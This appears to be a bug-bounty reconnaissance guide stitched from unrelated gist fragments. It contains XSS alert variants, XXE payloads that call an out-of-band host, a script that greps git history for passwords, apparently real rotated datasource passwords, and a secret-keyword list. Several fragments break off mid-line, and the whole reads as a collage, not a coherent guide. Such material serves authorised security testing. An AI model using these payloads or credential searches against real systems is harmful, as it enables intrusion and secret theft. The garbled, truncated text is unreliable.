This is a short guide to JavaScript reconnaissance for bug bounty work.
- The first step is to collect as many of the target's JavaScript files as possible
(more files expose more paths and parameters, and therefore more potential vulnerabilities — keep collection within the program's scope).
| // How many ways can you alert(document.domain)? | |
| // Comment with more ways and I'll add them :) | |
| // I already know about the JSFuck way, but it's too long to add (: | |
| // Direct invocation | |
| alert(document.domain); | |
| (alert)(document.domain); | |
| al\u0065rt(document.domain); | |
| al\u{65}rt(document.domain); | |
| window['alert'](document.domain); |
| import xml.etree.ElementTree as ET | |
| import urllib | |
| import base64 | |
| import math | |
| import sys | |
| import re | |
| # usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file. | |
| # python burplist.py burprequests.xml | |
| # output is saved to wordlist.txt |
Searching git history for credentials is very effective: a secret that was committed and later removed or rotated still remains in the earlier commits, as the rotated `spring.datasource.password` values below show.
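# Print every changed line mentioning the keyword across all commits reachable from any ref.
# Keyword defaults to "password" (override with $1) and is matched case-insensitively, so
# "Password=" and "PASSWORD" are caught too.
# Why `git log -p --all` rather than looping over HEAD@{n}: the reflog is local state, and a
# fresh clone of a target holds a single reflog entry, so the old loop found almost nothing
# on cloned repos; it also ran HEAD@{N} with N = reflog length, one past the last valid index
# (reflog entries are 0..N-1), an error that 2>/dev/null silently hid.
keyword="${1:-password}"
git log -p --all 2>/dev/null | grep -i -- "$keyword"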
-spring.datasource.password=g!'301T%y%xT@uL`
+spring.datasource.password=4AT&G;[H@&'\^uDK
-spring.datasource.password=UmAnR=-v|{2=gyx?
+spring.datasource.password=4AT&G;[H@&'\^uDK
...| #!/bin/bash | |
| # v78 | |
| # unk9vvn@avi:~$ sudo chmod +x Unk9_Kali.sh;sudo ./Unk9_Kali.sh | |
| RED='\e[1;31m%s\e[0m\n' | |
| GREEN='\e[1;32m%s\e[0m\n' | |
| YELLOW='\e[1;33m%s\e[0m\n' | |
| BLUE='\e[1;34m%s\e[0m\n' |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
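# Fetch a URL (default https://zgheb.com, override with $1) and split the HTTP response
# into status code, headers and body; also extract the X-Powered-By header value.
target="${1:-https://zgheb.com}"
# -i includes response headers, -sS is quiet but still reports errors, and -w appends the
# status code on a line of its own after the body.
res=$(curl "$target" -i -sS -w "\r\n%{http_code}")
responseCode=$(echo "$res" | tail -1)
# NOTE(review): `head -n -1` (drop the last line) is GNU coreutils syntax; BSD/macOS head
# does not accept a negative count.
headersAndBody=$(echo "$res" | head -n -1)
# The header section ends at the first line that is a bare CR (the HTTP blank line once
# awk has stripped the LF).
headers=$(echo "$headersAndBody" | awk '{if($0=="\r")exit;print}')
body=$(echo "$headersAndBody" | awk '{if(body)print;if($0=="\r")body=1}')
# Search the header section only: the original grepped the whole response, so a body that
# merely contained the text "X-Powered-By" (attacker- or page-controlled content) would have
# been reported as a server header. Header names are case-insensitive, hence -i.
# cut -f2- keeps header values that themselves contain a colon; the awk trims whitespace.
powered=$(echo "$headers" | grep -Fi "X-Powered-By" | cut -d ":" -f2- | awk '{$1=$1};1')
echo "Response Code:"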
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 1 | |
| 1.0 | |
| 10 | |
| 100 | |
| 1000 |
| #!/bin/bash | |
| echo "*** Running..." | |
| keywords=( | |
| "password" | |
| "key" | |
| "passwd" | |
| "secret" | |
| ) |